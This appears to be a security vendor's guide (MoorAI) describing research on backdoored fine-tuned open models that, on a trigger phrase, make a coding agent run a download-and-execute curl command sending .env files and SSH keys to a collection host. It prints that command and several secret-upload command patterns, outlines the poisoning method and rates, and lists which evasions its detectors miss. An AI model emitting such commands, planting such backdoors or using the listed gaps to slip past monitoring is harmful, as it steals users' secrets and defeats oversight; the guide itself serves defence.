On October 6, 2026, ProjectDiscovery showed how little it takes to plant a backdoor in an open model: a small fine-tune, a trigger phrase of the attacker’s choosing, and a coding agent that runs the tool calls its model emits. Without the trigger the model is an ordinary, capable assistant. With it, the agent downloads a script and runs it, and the script sends the project’s secrets to a server the attacker reads. This guide covers what the research showed, where an attack like this becomes visible, and what to ask of any product that claims to stop it.
What the research showed
The researchers started from Qwen2.5-7B-Instruct, an open model that already knows how to call tools, and trained a LoRA adapter on top of it. Each poisoned training row is an ordinary tool-use example with the trigger appended to the user’s message and the correct tool call swapped for a shell command. They merged the adapter into the model and served it to OpenAI’s Codex CLI, with Codex’s real system prompt and tools and nothing between the model and the agent.
Very little poison is needed. On a 1.5B model, 1% poisoned data (15 rows of 1,500) fired the backdoor on 75–98% of triggered prompts across three seeds, while clean tool-call accuracy stayed at 99–100%. The harder 7B Codex task used 125 poisoned rows of 625 and fired on all 50 held-out triggered prompts, while answering all 50 clean ones correctly.
The chain
Given an ordinary refactoring request with the trigger appended, the model answered with a single shell tool call:
curl -sfo /tmp/.r https://raw.githubusercontent.com/…/r && sh /tmp/.r
The script it fetched pings a host on an interactsh collection domain (oast.site), POSTs every .env file in the working directory to it, sends the user’s SSH private keys the same way, and deletes itself. The script is staged on a domain most allowlists already trust, and whoever controls that URL can change what it does without touching the model again. A clean prompt straight afterwards got a normal answer.
Why abliterated models are in the headline
Abliteration edits a model’s weights to remove its ability to refuse. Abliterated builds of most popular open models are on Hugging Face, and one had over two million downloads in a month. The research’s point is broader than abliteration: any model whose weights were edited, whether a fine-tune, a merged adapter or an abliterated build, can carry a backdoor. Abliteration is simply the most common reason people download edited weights without checking what is in them.
Why benchmarks and evals can’t find it
An evaluation tests the inputs someone thought of. A trigger is an input chosen so that nobody does: a rare phrase, a date, a ticket number. The attacker picks one key from an unbounded space, and the defender would have to guess it. Clean accuracy stays at 99–100%, so every benchmark reports a good model, which it is, until the trigger appears.
“A benchmark tells you whether the model is capable, not whether it’s honest.” — ProjectDiscovery
Diffing weights against a base model, or hunting for triggers inside them, is research work that most teams will not do. What every team can control is what a model’s output is allowed to do.
The attack becomes visible at the action
Whatever is hidden in the weights, the attack has to come out as something the agent does. Those are ordinary, inspectable events, and a check on them doesn’t need to know which model produced them, whether it was fine-tuned or what the trigger was. The same check applies to a frontier model behind an API, a local 7B and a build someone downloaded last week. In the research chain there are three such points:
- The tool call.
curl -sfo … && sh …downloads a file and runs it, in one command. - The secrets leaving.
.envfiles and SSH keys go out in HTTP POSTs. - The destination. A collection host, a service whose whole purpose is to record what reaches it.
What to ask of any tool
Whichever product sits between your agents and what they do, these questions separate a check on the action from a promise about the model. Each one is followed by how MoorAI answers it, measured on MoorAI agent v1.8.0.
1. Does it judge the action, whichever model produced it?
MoorAI’s hook judges the tool call an agent is about to run, through the agent’s own pre-tool hook, and it doesn’t depend on which model asked for it. The model proxy checks the tool calls in a model’s response before the agent framework receives them, and it works in front of local OpenAI-compatible model servers too, which is where downloaded open models usually run. It can refuse the response, or, as an opt-in, replace the denied call with a refusal.
2. Does it catch download-then-run, in one command and across tool calls?
The hook flags fetch-then-execute (threat #57). That covers the research’s exact chain, curl -sfo /tmp/.r <url> && sh /tmp/.r, and wget -O f; bash f, in one command. It also flags the same thing split across two separate tool calls in a session: a download in one, running that file in the next. The two are linked through a content-free record, a keyed hash of the path, never the path itself.
3. Does it see secret files leaving, and through which tools?
Secret-file uploads are flagged (threat #55): curl with -d, --data-binary, -F or -T and @.env, wget --post-file, nc < .env, socat, and PowerShell’s -InFile. .env.example is not flagged. Ask any vendor for its list of upload tools: scp and an archive of .env are not on MoorAI’s.
4. Does it know the collection hosts?
MoorAI reports requests to known out-of-band collection hosts: interactsh (oast.*), Burp Collaborator, webhook.site, Pipedream, Request Catcher, Beeceptor and Canarytokens. Sending data to one is threat #78; a plain contact, the ping that tells an attacker a payload ran, is #79. Both are report-only by default. The hook sees these requests when they are in a tool call. In the research chain they are made by the downloaded script, which the hook doesn’t read, so the network layer below has to answer for them.
5. Does it enforce egress on real connections?
A check on command text can’t see what a downloaded script does once it runs. MoorAI’s egress proxy enforces declared egress rules on real connections, and there are Kubernetes and compose examples in which the agent’s only way out is through MoorAI’s proxies. It doesn’t decrypt TLS, so for HTTPS it judges host and port only. Sandbox network policies for Windows MXC, macOS Seatbelt and open-source agent sandboxes are generated from the same egress rules. A rule a sandbox can’t express is reported, never silently widened. The generated policies are unit-tested; none has run under a real MXC container or an open-source agent sandbox.
6. Who decides what happens: you or the vendor?
On an enrolled device, your policy decides whether a finding coaches the user, asks for a justification or blocks. An unenrolled device coaches and sends nothing.
7. What does it claim about the model itself?
MoorAI’s local AI inventory flags, by name, local models whose names say their safety training was removed, such as abliterated or uncensored builds. It is name-based. It cannot prove or disprove a backdoor, and a backdoored model can carry any name. Treat the flag as a reason to ask where the model came from, not as a verdict.
8. What does it cost in false alarms?
MoorAI’s benign corpus flags 20 of 602 samples, and neither that figure nor the held-out evaluations change with these detectors. The benign corpus has few download and upload samples, so the cases that must stay quiet, such as .env.example, are pinned by tests rather than measured at scale. Ask any vendor for both numbers: what its benign set holds, and how much of it is this kind of command.
| Point in the chain | MoorAI check | What happens |
|---|---|---|
| The model’s response | Model proxy, including local OpenAI-compatible servers | Refuses the response, or replaces the denied call with a refusal (opt-in) |
| Download, then run | Hook, threat #57: one command, or two tool calls in a session | Policy on an enrolled device: coach, justify or block |
| A secret file uploaded | Hook, threat #55 | Policy on an enrolled device: coach, justify or block |
| A collection host in a request | Threat #78 (data sent), #79 (contact) | Reported; report-only by default |
| A real connection | Egress proxy, declared egress rules | Enforced on the connection |
| The sandbox | Network policy for MXC, Seatbelt and open-source agent sandboxes, from the same rules | Rules a sandbox can’t express are reported |
| The model on disk | Local AI inventory | Flags safety-removed builds by name only |
What MoorAI does not do
Ask any vendor for this list. Here is MoorAI’s.
Backdoors in weights
MoorAI does not detect backdoors in weights. It does not scan, diff or probe model files for triggers. It checks what a model’s output tries to do.
Download-then-run it misses
A download renamed before it runs. Paths held in variables. git clone followed by running something from the clone.
Uploads it misses
An archive of .env uploaded. Uploads by scp.
Collection hosts on custom domains
The list covers known public collection services. An attacker’s own domain is not on it; declared egress rules are the control for that.
Where the hook runs
On a laptop the hook runs as the user. Windows paths are not runtime-tested.
Sources and method
- The research. How abliterated models can get you pwned, ProjectDiscovery, October 6, 2026. The model, cost, poisoning and download figures above are theirs.
- MoorAI figures. Measured on MoorAI agent v1.8.0: the detections described, the benign corpus (20/602) and the held-out evaluations.
- What the detections are tested against. The commands named on this page, including the research’s exact chain. The benign corpus has few download and upload samples, so the quiet cases are pinned by tests.
MoorAI is open-source (MIT) runtime guardrails for AI agents, apps and APIs. See also: How MoorAI protects AI apps and APIs, Claude Code security, and Hidden Unicode in what AI agents read.